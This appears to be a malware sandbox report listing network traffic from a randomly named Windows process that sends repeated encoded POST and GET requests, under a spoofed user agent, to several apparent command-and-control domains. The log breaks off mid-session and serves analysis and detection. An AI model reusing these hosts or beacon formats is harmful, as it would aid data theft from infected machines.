                                                                        Nov 9, 2024 05:37:41.686685085 CET805001367.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:41.686805964 CET5001380192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:41.687714100 CET5001380192.168.2.567.223.117.142
                                                                        Nov 9, 2024 05:37:41.692508936 CET805001367.223.117.142192.168.2.5
                                                                        Nov 9, 2024 05:37:46.767187119 CET5001480192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:46.772007942 CET8050014172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:46.772068024 CET5001480192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:46.790672064 CET5001480192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:46.795455933 CET8050014172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:47.776160955 CET8050014172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:47.862631083 CET5001480192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:47.982465982 CET8050014172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:47.982569933 CET5001480192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:48.299506903 CET5001480192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:49.321173906 CET5001580192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:49.326045990 CET8050015172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:49.329265118 CET5001580192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:49.341437101 CET5001580192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:49.346242905 CET8050015172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:50.325305939 CET8050015172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:50.405095100 CET5001580192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:50.528405905 CET8050015172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:50.528455019 CET5001580192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:50.846370935 CET5001580192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:51.866117954 CET5001680192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:51.871001005 CET8050016172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:51.871103048 CET5001680192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:51.880980968 CET5001680192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:51.885751963 CET8050016172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:51.885951042 CET8050016172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:52.860331059 CET8050016172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:53.020319939 CET5001680192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:53.058199883 CET8050016172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:53.058252096 CET5001680192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:53.395164013 CET5001680192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:54.412636042 CET5001780192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:54.417514086 CET8050017172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:54.417581081 CET5001780192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:54.426398993 CET5001780192.168.2.5172.96.191.232
                                                                        Nov 9, 2024 05:37:54.431180954 CET8050017172.96.191.232192.168.2.5
                                                                        Nov 9, 2024 05:37:55.435995102 CET8050017172.96.191.232192.168.2.5
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                        Nov 9, 2024 05:38:42.205980062 CET53585181.1.1.1192.168.2.5
                                                                        Nov 9, 2024 05:38:55.646624088 CET5210053192.168.2.51.1.1.1
                                                                        Nov 9, 2024 05:38:56.271589041 CET53521001.1.1.1192.168.2.5
                                                                        Session ID: 0 | Source IP: 192.168.2.5 | Source Port: 49776 | Destination IP: 194.195.220.41 | Destination Port: 80 | PID: 3660 | Process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp: Nov 9, 2024 05:35:28.732023954 CET | Bytes transferred: 491 | Direction: OUT | Data:
                                                                        GET /2t4j/?J8LHgDJp=76BBSHLebMFInx415ME5nsaWAX7vqpkDMKUIFXyWJTjkcZQycFcIpYDenhjJ2rT89sPaLHitdl181guZmt6MFlr0ftv27uO4BWOF65kRMGEDoBp+CAe+LLLR26U78pjUdQ==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.tubetrexhd.buzz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Timestamp: Nov 9, 2024 05:35:29.320390940 CET | Bytes transferred: 1236 | Direction: IN | Data:
                                                                        HTTP/1.1 200 OK
                                                                        Server: openresty/1.13.6.1
                                                                        Date: Sat, 09 Nov 2024 04:35:29 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Ascii: 4c8<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.tubetrexhd.buzz/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.tubetrexhd.buzz/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.tubetrexhd.buzz/2t4j?gp=1&js=1&uuid=1731126929.9738454148&other_args=eyJ1cmkiOiAiLzJ0NGoiLCAiYXJncyI6ICJKOExIZ0RKcD03NkJCU0hMZWJNRklueDQxNU1FNW5zYVdBWDd2cXBrRE1LVUlGWHlXSlRqa2NaUXljRmNJcFlEZW5oakoyclQ4OXNQYUxIaXRkbDE4MWd1Wm10Nk1GbHIwZnR2Mjd1TzRCV09GNjVrUk1HRURvQnArQ0FlK0xMTFIyNlU3OHBqVWRRPT0mYUY9SkxwNG8wUXgyRi1wNEYiLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsaWNhdGlvb [TRUNCATED]
                                                                        Timestamp: Nov 9, 2024 05:35:29.320408106 CET | Bytes transferred: 156 | Direction: IN | Data:
                                                                        Data Ascii: yI6ICIxZDg3IiwgImFyZ3NfYyI6ICJlYjA1IiwgInJlZmVyZXJfYyI6ICJhNjg3IiwgImFjY2VwdF9jIjogIjUzZDAifQ=="; } </script> </body></html>0


                                                                        Session ID: 1 | Source IP: 192.168.2.5 | Source Port: 49911 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 3660 | Process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp: Nov 9, 2024 05:35:52.675026894 CET | Bytes transferred: 740 | Direction: OUT | Data:
                                                                        POST /t61z/ HTTP/1.1
                                                                        Host: www.moneta.life
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.moneta.life
                                                                        Referer: http://www.moneta.life/t61z/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=dZJCNG9Xj7DvAi9ejpIkzGHYwh9Y5DlBVDJSkboIch2iBNL/kC4eC2shxQMVAk9LP6OI7Lcjki6KE2f12KOQL9Ep3dHSAFR6zYjSWNbxPFKz0fJHehArqQLQbqhTQhFhr1vf+9cc8uS+o5NIymPlGKSNDXzHKPRtLGJb/gy2Uh6frMGue/tdAy88O1Qh89OlHgB5hio=


                                                                        Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49927 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 3660 | Process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp: Nov 9, 2024 05:35:55.222735882 CET | Bytes transferred: 760 | Direction: OUT | Data:
                                                                        POST /t61z/ HTTP/1.1
                                                                        Host: www.moneta.life
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.moneta.life
                                                                        Referer: http://www.moneta.life/t61z/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=dZJCNG9Xj7DvBB1emKQk7GHb8B9YwjlFVDFSkfxTfTCiBtb/lD4eD2sh+wMqd09UP6D17LgjkmqKE3v115mXKtEv69HMEFR6zYjSWNfbPBmz0qZHMT4qrQLTN6hTaBEJr1v9+8Al8sq+o9dIy3PmJKSUeHyoFdQnBFAO3Q7zVw2Zja3EEdl1TSQEemYWtNvMdDRJ/190PseclOkLFfHYaxXkw9Tr


                                                                        Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49942 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 3660 | Process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp: Nov 9, 2024 05:35:57.770834923 CET | Bytes transferred: 1777 | Direction: OUT | Data:
                                                                        POST /t61z/ HTTP/1.1
                                                                        Host: www.moneta.life
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.moneta.life
                                                                        Referer: http://www.moneta.life/t61z/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36


                                                                        Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49956 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 3660 | Process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp: Nov 9, 2024 05:36:00.312486887 CET | Bytes transferred: 487 | Direction: OUT | Data:
                                                                        GET /t61z/?J8LHgDJp=QbhiOx00h/rFbDhCzcx72F6h1mdg1yJMVj9Qvc8sejmtB5T8qlwycmwhvDAYX2QAFqqRkYoUzkyWExrL+4KEHOogqLXxPl8o8avUe8e/R2yv7tJPERVtmQXUL45HQRgD9g==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.moneta.life
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Timestamp: Nov 9, 2024 05:36:01.353607893 CET | Bytes transferred: 414 | Direction: IN | Data:
                                                                        HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Sat, 09 Nov 2024 04:36:01 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 274
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?J8LHgDJp=QbhiOx00h/rFbDhCzcx72F6h1mdg1yJMVj9Qvc8sejmtB5T8qlwycmwhvDAYX2QAFqqRkYoUzkyWExrL+4KEHOogqLXxPl8o8avUe8e/R2yv7tJPERVtmQXUL45HQRgD9g==&aF=JLp4o0Qx2F-p4F"}</script></head></html>


                                                                        Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49986 | Destination IP: 76.223.67.189 | Destination Port: 80 | PID: 3660 | Process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp: Nov 9, 2024 05:36:06.456990004 CET | Bytes transferred: 767 | Direction: OUT | Data:
                                                                        POST /n1dp/ HTTP/1.1
                                                                        Host: www.mjmegartravel.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.mjmegartravel.online
                                                                        Referer: http://www.mjmegartravel.online/n1dp/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=mw2hY5RKgr1zrBnMCAP6apSVsP3E4hjobf8yr90kNH7z6ATy/NhJfZXIfKBniMH9zC0egvEFgYlEcUxWlrPMBKqL+5NqcWVtYMFy1APX4A6ykpTbK80GAdNPWZmD3jCDR5iQgOvYXOrO7qs2eqMObSQUGWmOkBhurxkKdMClTMwPL6uqWyHhgDqodwKfylklpTca5Qw=


                                                                        Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49987 | Destination IP: 76.223.67.189 | Destination Port: 80 | PID: 3660 | Process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp: Nov 9, 2024 05:36:09.005014896 CET | Bytes transferred: 787 | Direction: OUT | Data:
                                                                        POST /n1dp/ HTTP/1.1
                                                                        Host: www.mjmegartravel.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.mjmegartravel.online
                                                                        Referer: http://www.mjmegartravel.online/n1dp/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=mw2hY5RKgr1ztlbMFnT6dJSWyf3EzBjsbfwyr5thM1vz5l/y+PZJcZXIHaBmssGQzC48gq8FgYxEcQhWlbzPHaqN45NoBGVtYMFy1AqM4ACyk5jbKZUZN9NOGJmD9zCPR5i+gPzhXNDO7oE2ebMNSSQaFmnlhxE/nChHAN7nKqAkKMfAMQPJzjGQNjCojVFMzwMqnHkdiflHZZpB7dyrtIACOkV+


                                                                        Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49988 | Destination IP: 76.223.67.189 | Destination Port: 80 | PID: 3660 | Process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp: Nov 9, 2024 05:36:11.551778078 CET | Bytes transferred: 1804 | Direction: OUT | Data:
                                                                        POST /n1dp/ HTTP/1.1
                                                                        Host: www.mjmegartravel.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.mjmegartravel.online
                                                                        Referer: http://www.mjmegartravel.online/n1dp/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp= [TRUNCATED]


                                                                        Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49989 | Destination IP: 76.223.67.189 | Destination Port: 80 | PID: 3660 | Process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp: Nov 9, 2024 05:36:14.290581942 CET | Bytes transferred: 496 | Direction: OUT | Data:
                                                                        GET /n1dp/?J8LHgDJp=ryeBbJYUvalC4Gf2UXy7Qc/r17vTzADlU+kriaheCGn+31zAxY9EcJfSGqt2t+ma9yg9hIhC3ppYERZTlK/9H+6asqo2CGRUX6V95R7Z3XOuyoyAAN44PtQ+X9f95w6KKw==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.mjmegartravel.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Timestamp: Nov 9, 2024 05:36:15.160938025 CET | Bytes transferred: 414 | Direction: IN | Data:
                                                                        HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Sat, 09 Nov 2024 04:36:15 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 274
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?J8LHgDJp=ryeBbJYUvalC4Gf2UXy7Qc/r17vTzADlU+kriaheCGn+31zAxY9EcJfSGqt2t+ma9yg9hIhC3ppYERZTlK/9H+6asqo2CGRUX6V95R7Z3XOuyoyAAN44PtQ+X9f95w6KKw==&aF=JLp4o0Qx2F-p4F"}</script></head></html>


                                                                        Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49990 | Destination IP: 172.217.16.211 | Destination Port: 80 | PID: 3660 | Process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp: Nov 9, 2024 05:36:20.215183020 CET | Bytes transferred: 758 | Direction: OUT | Data:
                                                                        POST /q6od/ HTTP/1.1
                                                                        Host: www.digitaladpro.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.digitaladpro.shop
                                                                        Referer: http://www.digitaladpro.shop/q6od/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=GdEo2Bs9nEp7mjZB/byPLBUMWPmQTPCr01dSXN3vF29emyTVqlP5fLszdwj95+6065RaAi1ozsfnH+L3cm99c83zP05jaMLkeiJq23m5OPH3oZ9II6NSlDhNqa/pm7B3NMLwztFP8U0vIKQrLOT1y71+qB2VW9g2FCCmZmAtELDqMZQwOukEu5rXXYi6vQY8UZM6pLk=
                                                                        Timestamp: Nov 9, 2024 05:36:21.084949970 CET | Bytes transferred: 1236 | Direction: IN | Data:
                                                                        HTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:36:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Server: ghs
                                                                        Content-Length: 1566
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                        Timestamp: Nov 9, 2024 05:36:21.085036039 CET | Bytes transferred: 537 | Direction: IN | Data:
                                                                        Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                        Session ID: 10 | Source IP: 192.168.2.5 | Source Port: 49991 | Destination IP: 172.217.16.211 | Destination Port: 80 | PID: 3660 | Process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp: Nov 9, 2024 05:36:22.909890890 CET | Bytes transferred: 778 | Direction: OUT | Data:
                                                                        POST /q6od/ HTTP/1.1
                                                                        Host: www.digitaladpro.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.digitaladpro.shop
                                                                        Referer: http://www.digitaladpro.shop/q6od/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=GdEo2Bs9nEp7mCpB54aPeRUPKfmQdvCv01RSXMzBFEJemQ7VpkP5cLszWQj43e7465N8AnVozsLnH+73bVFyN83xDU5hHcLkeiJq22GDOM33ostIJbNN7ThS7a/pi7AwNML3zuBh8R4vIP0rLaHynL18nh37A9JZdg2HYl1EbpbfAPhaUMss9ZHvHLqN+g5VO6cK3czrzyvghwiL8PFGGwTtquaQ
                                                                        Timestamp: Nov 9, 2024 05:36:23.659239054 CET | Bytes transferred: 1236 | Direction: IN | Data:
                                                                        HTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:36:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Server: ghs
                                                                        Content-Length: 1566
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                        Timestamp: Nov 9, 2024 05:36:23.659260035 CET | Bytes transferred: 537 | Direction: IN | Data:
                                                                        Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                        Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49992 | Destination IP: 172.217.16.211 | Destination Port: 80 | PID: 3660 | Process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp: Nov 9, 2024 05:36:25.597935915 CET | Bytes transferred: 1795 | Direction: OUT | Data:
                                                                        POST /q6od/ HTTP/1.1
                                                                        Host: www.digitaladpro.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.digitaladpro.shop
                                                                        Referer: http://www.digitaladpro.shop/q6od/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp= [TRUNCATED]
                                                                        Timestamp: Nov 9, 2024 05:36:26.433048964 CET | Bytes transferred: 1236 | Direction: IN | Data:
                                                                        HTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:36:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Server: ghs
                                                                        Content-Length: 1566
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                        Timestamp: Nov 9, 2024 05:36:26.433077097 CET | Bytes transferred: 537 | Direction: IN | Data:
                                                                        Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                        Session ID: 12 | Source IP: 192.168.2.5 | Source Port: 49993 | Destination IP: 172.217.16.211 | Destination Port: 80 | PID: 3660 | Process: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp: Nov 9, 2024 05:36:28.147900105 CET | Bytes transferred: 493 | Direction: OUT | Data:
